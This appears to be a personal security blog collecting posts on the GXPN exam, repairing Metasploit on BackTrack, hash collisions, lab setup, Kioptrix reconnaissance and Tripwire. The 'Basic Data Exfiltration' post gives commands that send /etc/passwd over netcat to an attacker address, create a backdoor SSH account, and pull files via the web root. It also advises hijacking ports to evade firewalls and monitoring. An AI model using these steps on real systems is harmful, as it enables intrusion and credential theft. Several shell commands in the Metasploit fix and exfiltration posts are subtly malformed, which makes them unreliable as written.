GXPN - getz!

After the many weeks of crazy after-office hours and weekends, I've finally went for the first attempt and passed the GIAC GXPN http://www.giac.org/certification/exploit-researcher-advanced-penetration-tester-gxpn . It's quite a challenge and probably the hardest examination I've ever took since my computer engineering degree days. For me, I attended Stephen Sim's class (SANS SEC660) and it was the best EVAR. Although things get pretty hairy after day 3, it's totally worth it. And I'm thankful for my company who sponsored the hefty amount. If you're into security, it's like attending a rock concert and get wow-ed at every juncture of the course.

If you decide, however, not to attend SANS SEC660 and do a GIAC attempt, you could do so too. Some tips on preparation can be found @ iPostive's blog: http://ipositivesecurity.blogspot.sg/2012/08/passed-giac-gxpn-exam.html

Btw, GXPN is a 3-hour open book examination and you're allowed to use the course materials. Open-book examinations are usually tougher and kinda applies in this case too. For those who have signed up or intend to attempt the GIAC GXPN in the near future, I've made an index for a quick-flip (trust me - you'll probably need it) and a "time reference" table to help keep track of time since you can only skip 5 questions. http://pastebin.com/wwPVMiqc

Some ways to use it:

1. Use word or some open source office tools to split the page to 3 columns

2. Cut and paste the contents from the pastebin.com link http://pastebin.com/wwPVMiqc

3. Shrink the margin or font to your preference to fit to the number of pages (mine is a 2-page index)

4. You could add/remove more keywords/phrases/toolnames into the index to make it better for your own use.

So what's with the page?

If it says for e.g. Tool X 4.125 - it means Book 4, page 125.

If you want to know how GIAC GXPN is like, you could also goto http://www.pwnag3.com/2012/10/gxpn-review.html to read his/her review.

So what do the candidate need to prepare:

Try this link: http://www.giac.org/certification/exploit-researcher-advanced-penetration-tester-gxpn

Some tips that helped me:

1. Do the TWO practice exams - they are a good indicator. I got 60% without any book reference. Got a 77% for 2nd practice. And final got a 78%. (Not great, but i'm thankful I've passed. I wished I studied more.)

2. You have to know your basics (nmap, cain rdp mitm, lsa, etc). They are not found in GXPN coursewares and I suspect they are from the SEC560 coursewares. Not too sure about that.

3. You have to know your stuffs really well. Reading is NOT good enough - you'll need to set up your lab environment and spend time working. There's really no shortcut to this - you can't braindump bruteforce your way through this exam.

NOW I AM A FREE BIRD =D Gonna go celebrate a little before returning to my side projects ;)

To the GXPN attempters: Good luck folks!

J.S out.

Fix your BTR3 4.5.0 Metasploit After Update Guide

After Kali went official, BTR3 was kinda abandoned and I got to see alot of pissed off people online looking to fix their Backtrack 5 R3's metasploit. Due to work's requirement, I start scouring for help all over the interwebs and found a few useful instructions. Here's a post to summarize and consolidate all the help I've gotten by nice folks on the internet. Hope this step-by-step guide will un-break your metasploit on your BTR3. It'll not take more than 15mins. Have fun!

Main idea: Upgrade your BT's Ruby from 1.9.2 to 1.9.3

Error: You may have encountered the error when trying to get Factory Girl 4.2.0 to work while perform 'bundle install' as requested by sir Metasploit himself. 

Summary of fix:

- Install 1.9.3

- Fresh install of metasploit using 'git clone' (avoid the SVN version from now on)

- And as usual, link and unbreak stuffs.

Limitation of fix:

Bad news, BTR3 doesn’t have Ruby1.9.3 in the repository so RVM is being used to install the version.

Need to do ‘/bin/bash –login’ whenever ./msfconsole is to be used.

Steps to retrieve the working version of metasploit

1. # cd /opt/

2. # rm -rf metasploit

3. # git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit

Let's open a new tab by pressing ctrl-shift-t.

Steps to install Ruby 1.9.3

1. # bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)

2. # source /etc/profile.d/rvm.sh

3. # rvm -v

Let's fix up some libraries we need:

4. # package in zlib openssl libxslt libxml2; do rvm pkg install $package; done

5. # rvm install 1.9.3

You'll get error saying you need certain dependencies. 

6. # apt-get install <dependency 1> <dependency 2> ...

And of course, libssl-dev will still be screwed coz' current repository doesn't contain the right one. Let's add one to our /etc/apt/sources.list

7. # echo >> deb http://security.ubuntu.com/ubuntu lucid-security main /etc/apt/sources.list

8. # apt-get install libssl-dev 

Let's proceed to install our dear ruby 1.9.3 runtime:

9. # rvm install 1.9.3

So done? Let's switched to it. Current version will be 1.9.2-dev, so we gotta use our new shiny ruby 1.9.3.

10. # rvm 1.9.3 --default 

You'll see an error. So you'll need to do a login shell coz the current one just won't do.

11. # /bin/bash --login

12. # rvm 1.9.3 --default

13. # ruby -v

Now we have our 1.9.3. But something's still broken (yes of course, of course). Let's fix the pg.

14. # apt-get install libpq-dev

15. # gem install pg

Ok. Final moment of truth, let's proceed to the metasploit folder now!

16. # cd /opt/metasploit

17. # bundle install

*DEEP BREATH* Yes. Factory Girl 4.2.0 will install properly with Ruby 1.9.3 ;) And yes, you will be able to ./msfconsole

Long load time for ./msfconsole without any error means good news.

Congratulations! (and ba*ls to backtrack for not automating the update.)

References & Acknowledgements:

http://guides.dradisframework.org/install_on_backtrack.html

https://community.rapid7.com/thread/3207

Metasploit broke after updated to 4.5.0bt

:(

I broke my metasploit when I did a `apt-get install metasploit` to upgrade it.
It's not 4.5.0bt but msfconsole don't work anymore and so is msfupdate. Royally screwed if you ask me.

But there's a few ways to fix it:
1. http://fl3x.us/blog/2013/01/11/solving-msfconsole-msfupdate-issue-after-update-metasploit-to-4-5-0/

2. apt-get purge metasploit
then apt-get install metasploit
-> Basically a reinstallation if 1) doesn't work for you.

I needed to do 2).

Now I'm still trying to fix msfupdate. Msfconsole restored but msfupdate's still broken. Argh.

Broke,
J.S.

Random thoughts: The Birthday Paradox

The Birthday Paradox can be explained by presenting a scenario:

The Birthday problem - 

Out of the 366 possible birthdays (including Feb 29th), what's the chance of, in a crowd of 23 people, that two would be sharing a birthday? A crude guess: Could it be 10%, 20% or maybe 30%? No, 50%. In fact, with only 57 people in a room, the probability shoots up to 99%.

I'm not here to explain the Math, so if you wanna know more, try visiting: (clean urls btw)

http://en.wikipedia.org/wiki/Birthday_problem

http://betterexplained.com/articles/understanding-the-birthday-paradox/ <== it's got a generator too

So what?

Putting this 'paradox' into hash, colliding a super unique hash may take lesser time than you've thought! Say 2^32 = 4294967296 possible combinations:

To calculate hypothetical hashes with 20000c/s will require about 59 hours.

Chance of some match with the 'birthday paradox' in mind: JUST 80000 combinations (4s) will give you 50%. Wait a minute, that can't be right?!

The generator's generated results:

Number of pairs	3199960000 = (80000 * 79999)/2
Chance of a unique pair	100.0000% = 4294967295/4294967296
Chance of 3199960000 unique pairs	47.47% = (100.0000%)^3199960000
Chance of some match	52.53% = 1 - 47.47%
Actual Match %	100.00% = (1/1)

Ok, what's your point?

1. Of course, hashes these days are more than 32 bit. But still, I won't use MD5 as 128-bit digest under this scheme is easier than collide than you thought.
2. You have more chance to working with collision than bruteforce with weak hashes such as MD5 (and before). If system authentication process passwords by hashing them and matching with existing stored hash for verification, there's a chance you can use an alternate password to gain access. Sounds like magic - I KNOW.

* If you found some flaws in my logic or math (if any, lol) expressed above, please do help correct.  

Well, these are just some random thoughts...

Break to protect,

J.S.

SANS SEC660

Hey all,

I'm excited to let you guys know that I'll be taking the SEC660 class offered by SANS Institute. For the whole of next week (5.5 days), the course will be covering more advance areas of a penetration tester and I can't wait! More information on the SEC660 can be found here: https://www.sans.org/course/advanced-penetration-testing-exploits-ethical-hacking

Previously, I took the 'basics' version of the curriculum by SANS, SEC560, and found that the course teaches you more than 'academic materials' or 'theories' but provide you with practical and working knowledge to do your job as a security professional. In addition, the instructors are veteran professionals themselves and they have shared quite a fair bit of their on-the-job experiences where are extremely valuable.

If you're taking SEC660 or other courses next week in Secure Singapore 2013, drop me a note to link up and I'll buy you a cuppa.

Break To Protect,
J.S.

Setting up a Penetration Testing Environment

Just a while ago, I was talking to another security enthusiast and we were discussing on "how to set up a pentest environment at home". The worse thing is that I only had access to Vmware workstation and attacking from a Backtrack 5 to a vulnerable machine. But that's just ONE hop and REAL environments have multiple hops (e.g. through a Firewall, DMZ, internal and one more internal).

Although I've read a couple of articles regarding setting up penetration testing environment, I still had no idea how to make one until yesterday. I was reading up on VMWare stuffs, I discovered this valuable page that can solve the problem of virtualizing your attacking and victim machines with firewalls and load balancers in the equation to test. Try reading this:
http://www.vmware.com/support/ws55/doc/ws_net_configurations_custom.html

Pre-requisite:
1. RAMS, LOTSA RAMS (I'm on 8GB)
2. Enough CPU resources (I'm on i5)
3. OF course, enough HDD space (I'm on 128SSD and 500HDD)
4. VMWare Workstation (I'm on a 8)
5. VMWare images (in this demo, I'll be using: BTR3, Smoothwall 3 Polar, An Exploitable Machine)

Configuring your VMWare Network Adaptors:
BTR5 - Two Network Adaptors
1. Bridged (or Vmnet 0)
2. VMnet 9 (Set Host-only)

Smoothwall 3 - Two Network Adaptors
1. VMnet 9 (Set Host-only)
2. VMnet 2 (Set Host-only)

Win XP / Metasploitable / KioptrixOther vulnerable victim machines
1. VMnet 2 (Set Host-only)

VMWare Workstation - Open Edit -> Virtual Network Editor
Add VMnet 2 and 9. DHCP is optional.

* Whatever IP you used for the VMnet, please do not use x.x.x.1 as they are used by the VMWare's Virtual Switches
Setting up your network:
BTR5 (*your eth[num] may be different, so adjust accordingly)
1. eth0 to your real local network address. For mine is 10.0.0.x/24. You'll be able to access internet from your backtrack5 for apt-get installs and wget of useful tools ;)
2. eth1 to 10.0.9.3/24
set your default gateway to 10.0.9.2 (Smoothwall 3's IP)

Smoothwall 3
1. Login as 'root' using 'happydays' as password
2. set your eth0 to 10.0.9.2/24
3. set your eth1 to 10.0.2.2/24
* Remember, don't get confused with your network adaptors connecting to their respective VMnets.

Win XP
1. Set your "Local Area Connection" interface to 10.0.2.100/24 and gateway to 10.0.2.2 (Smoothwall 3's IP also)

By now you should be able to do WIN XP -PING-> BTR5 and get a response.
However, you won't be able to have BTR5 ping WIN XP for some reasons.

Now it's a good time to WEB LOGIN to your Smoothwall 3's and start configuring it.
https://10.0.2.2:441/ using 'admin' and password as 'happydays'

This post I won't be sharing on the Smoothwall's configuration for port fowarding and other configuration. And REMEMBER, to make your Smoothwall's INTERFACE CONFIGURATION stay persistent, you'll need to CHANGE the Interfaces' IP address using the Web GUI.

Need help? Send me an email: breaktoprotect(at)gmail(dot)com

Thanks for reading. Happy fun times, people~

Break To Protect,
J.S.

Klutz with Local Group Policy

Part of my work requires me to perform configuration review of my clients' security settings of their hosts. So one of them is a 2003 and I was experimenting with a VM image. It took me quite a while searching on google to find the problem WHY my gpresults keep showing "No local group policy applied (empty)" despite me changing some settings in gpedit.msc.

Long story cut short, you NEED to set something under BOTH 'Computer Configuration' and 'User Configuration'. So if even you've set a trillion settings on 'Computer Configuration' and none on 'User Configuration', you'll get zilch when you do a gpresult/z>gpresults_%computername%.txt. And the same applies vice versa.[1]

After setting ONE item under 'User Configuration', I saw that my Local Group Policy was finally applied when I perform the gpresult. Awesome and phew~ Thank you forum folks from www.techexams.net

Break To Protect,
J. S.


Reference(s):
[1] http://www.techexams.net/forums/mcsa-mcse-windows-2003-general/66468-gpo-were-not-applied-because-they-were-filtered-out.html

Basic Data Exfiltration

So you pwned the system and got root access, awesome but what's next? Oh, I need to get the /etc/passwd and /etc/shadow out for a start. Ok how?

There are a couple of ways to do it:

1. Meterpreter's 'download' command

It's great if you're using meterpreter as the payload. Simple and hassle free. Just 'cd' and 'pwd' through the victim machine's directory without having to worry about the OS platform. But the limitation is if you are not using metasploit to pwn your victim machine, then you can't do this.

2. Netcat

Meow! Using this network utility to do a transfer of a binary file is definitely a viable option. 

All you'll need to do is:

Attacking Machine:~/goodies_folder/# nc -l -p 4444 > file_i_am_stealing.ext

Victim Machine:~/etc/# cat passwd | nc 192.168.1.200 passwd

* 192.168.1.200 is, of course, the attacker's machine IP address

Let's say the machine you've compromised has a host-based firewall that whitelist ports and deny all others, there are two ways to circumvent this:

- Tweak the iptable <= Not recommended, coz' you're changing critical configuration of the host machine. I wouldn't want to trigger the IPS or FIM monitoring this victim machine :S

- Shut down a service and hijack the port. <= Say XYZ service is a pretty much unused but available listening on port 112. Shut down the XYZ service, perform the exfil and then turn it back up. 

3. SSH

If the SSH daemon is up, create a new user e.g. ted

Victim Machine:~/# /usr/sbin/useradd ted

 Victim Machine:~/# /usr/bin/passwd ted

* Set your password 

Victim Machine:~/# echo >> /etc/ssh/sshd_config AllowUsers ted

Remember to do a netstat -tulpn | grep sshd to make sure that the SSH service is up.

Attacker's Machine:~/# ssh ted@192.168.1.100 password123

4. wget
Good if your victim's machine has a apache webserver up and running.
Simply copy all the files you wanna exfil to /var/www/html
and then:

Attacker's machine:~/# wget http://192.168.1.100 file_you_wanna_retrieve.ext 

Again, you want to make sure that your Apache is running ;)

5. Other ways
There are a couple of more ways but I need to run already, so here's some brief mentions:
- FTP <-- Set up FTP and SCP your way files through
- Covert Channels <-- You can craft ICMP packets and fit your data inside. Haven't tried it yet, but will blog it when I do.
- Email <-- It's lame, but if you got startx or you've VNC-ed into your victim's machine, you can exfil through web browsers =D

Alrighty, hope these helps. Gotta run. Happy fun times~

Break To Protect,
J.S. 

Nipper Studio Licensing Protection Bypass

Greetings all,

Ever heard of Titania's Nipper Studio (previously known as Nipper One)? It's a security audit tool which takes in configuration files such as your cisco running-configs or your sonicwall enchanced OS's configuration files and generates a very nice and comprehensive report on the device's current security posture. Especially when you don't have time going through files and files of configurations, Nipper Studio will do the audit job for you. Unfortunately, it's NOT open-source (was, but no longer) so you'll need to purchase it. For more information, visit: https://www.titania-security.com/nipperstudio

I was just evaluating the usefulness of the tool and I decided to want to move my eval license (or what's left of it) over to another computer, I couldn't. The license codes won't authenticate in the new machine. So I'll just looking around the directory in hope to 'transfer' my license over but couldn't find the license file. Guess what, it's in the registry and after some analysis, I managed to get it over. UNfortunately, I also discover a flaw in the licensing protection. This flaw allows you to repeatedly audit on devices with only 1 single working license. Hint: Work the registry ;) Such an awesome software yet with poor licensing protection - what a shame! =D

*Sorry guys, I will not be sharing the step-by-step cracking as you know, lawsuit, -$, jail-term, blah.

** If you happen to be Titania, and wish to find out more on the license exploitation, please contact me: breaktoprotect@gmail.com and I'll gladly work with you to resolve this. And of course, I'd expect you to at least buy me at least a cup of coffee. :)

Break to protect,
J.S.

Kioptrix Noob-ing #1

As usual, I'll be reading PDF books on my tablet on my way to work. Train rides can get really boring. Anyhow, I'm currently reading "Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide". I'm 100+ pages into it and i must say it has been informative. Get yours at http://www.amazon.com/Advanced-Penetration-Testing-Highly-Secured-Environments/dp/1849517746 or your *ahem* friends who might have it. 

So while I'm perusing through the pages, it recommended a Virtual Machine (VM) called Kioptrix to be downloaded at: http://www.kioptrix.com/blog/ for security testing purpose. The main objective is to obtain ROOT privileges through several ways you can think of: dictionary/bruteforce password, exploit, etc. (but since you can't do client-side attack, you probably can't social engineer, drive-by, mitm/sniff/, etc). Although there's a port 80 (and a 443) opened, you might not be able to do much via web attacks (but I might be wrong so drop a comment if you manage to do it =P ). 

Metasploit on Debian Raspberry (Soft-float) - Bad idea

Still obsessed with my little ARM friend, I tried to install metasploit on it. BUT, big BUT, it is SLOW. I don't mean "ah takes 15seconds" but "WTF, it's been 5minutes and i can't even bring up msfconsole" slow. Annoying as hell, I decided to rm -r msf3. I'll go back to BackTrack when I decide to proceed with an exploit. Yes, with several sweet ports open I would like to toss in some ready-made attacks to gain shell. However, I shall reserve it for later. 

*SPOILER ALERT*: Although I'm not pasting the results of the Kioptrix, I might reveal a few things that you may wish to discover yourself while playing around with Kioptrix. If you want to do Kioptrix all by your own without any influence/advice/help, please do not view the content below. You have been warned!

Recon & Next step against Kioptrix 

You can't do much except to see this very nice screen via VMware workstation (or vmplayer):

This VM will sit in your subnet. So if you're on 192.168.0.0/24, it might be a 192.168.0.5.

Remember, you'll need a DHCP (in this case my home router) in order for Kioptrix to get its IP.

So what I did so far:

1. Fping - sweep the whole friggin' subnet and identify the sorethumb.

2. Nmap - your fundamental reconnaissance, preferrably with OS detection and NSE scripts.

* I won't be pasting the spoiler results.

3. Bruteforce - even as I speak, my good ol' Rasp pal is bruteforcing the crap out of the Kioptrix. 

Python SSH Bruteforce

It's the standard garden variety bruteforcing in attempt to login by "guessing" the password on the SSH server listening on port 22. Either you do the dictionary attack (commonly used words, phrases, etc) or a literal bruteforce (every possible character set) and then pray that you get in. Not very elegant but heck, if it works, why not?

Btw, I'm using Christian Martorella's python program. More instructions at:

http://zeldor.biz/2011/01/how-to-bruteforce-ssh/ 

with the password list:

wget http://dazzlepod.com/site_media/txt/passwords.txt

I've been wanting to install Nessus 5 on it but seems like it only supports i386/x86-64 arch (RPi's ARM arch). Meanwhile, I'll keep searching for decent vulnerability scanners that can installed and used on the RPi.

Happy fun times~

Break To Protect,

J.S.

Basics FIM-ing

What's FIM?

FIM stands for 'File Integrity Monitoring'. It's a host-based IDS that detects any changes to files, especially those which sits in critical directories such as /etc/, /boot/, /lib/modules, /root/ or in windows your system or system32 folder. You get to pick and choose ;)

How does it work?

The FIM will do a hash (MD5, SHA-1, etc) on the target file or directory that is chosen to protect, and then securely keep this 'hash' as a BASELINE. So periodically, the FIM will do same hashing task but compare it with the BASELINE 'hashes' generated previously.

e.g. I want to monitor /folderX/ and its contents.

The FIM can be set to trigger warning if:

#1 Attackers add/remove files within /folderX/

or

#2 Attackers EDIT one of my existing files within /folderX/

This means that if any attacker attempts to upload foreign objects, be it malware or a netcat program into the monitored system, the FIM will trip and the administrators will start their prowl. 

So, what's cooking?

To avoid such IDS, the first step is to play around with one in your own lab environment. So I've downloaded Tripwire (www.tripwire.org) on my Debian Raspberry PI to experiment around a little. If you're using Debian, you can get it by:

sudo apt-get install tripwire

* If you get some funky error messages, do this first: 

sudo apt-get update

Setting up isn't hard. To trigger the Tripwire for testing purposes, just add a random txt file in your /root/: 

sudo touch /root/ intrusion_vector.txt

And it should trip when you do a:

sudo tripwire --check 

But of course, this is NOT the full instructions. There are config and policy files to talk about. The steps from  "compiling" the policy files, generating the baseline database and to the cron job that continually performs the --check command, I'm not really inclined to explain them as I've found one site which is extremely helpful. So I'll recommend Meryll Larkin's tutorial to Tripwire:

http://www.alwanza.com/howTo/linux/tripwire.html

She's a lifesaver to setting this FIM up! :) Thanks Larkin.

If you need some help, feel free to drop your comments below and I'll see what I can do.

Peace out,
J.S.

Hello World, and what is this?

This is a online journal to pen down my personal experience gained from performing security testing. What is to be achieved through writing this blog:
1. A Journal - a record of my findings, experience, discovery, etc. So basically a platform for my own recollection needs and at the same time share the information. Information should be free.
2. A Guide - may not be as useful for the veterans but will attempt to provide security 101 to non-security folks
3. A Challenge - for myself to consistently grow in knowledge and skills. I'm thinking of doing 'a hack a week' to bring my lazy ass to learn. Hmm...

Lastly, I'm nowhere near a pro. But I'm working towards in becoming better and attempting to bring value to the community. And in times, I'll may be presenting the work of past giants and today's experts for educational purpose. If I've forgotten to credit you, please know that I have no intention to plagiarize nor claim credit for work I have not done and DO email me and I'll make the wrong right. ;)

Thanks for reading!

Disclaimer: Use this site at your own risk. This site is meant for educational purpose only. And if you decide to use it for crimes and you're caught, you can be sure that you and you're ass will be thrown in the federal prison before you can even attempt to utter an excuse. So, be a responsible hacker who contributes to the security space, not a criminal nutcase. When in doubt of a certain tool and its potential impact, don't use it on production systems.

Break To Protect,
J.S.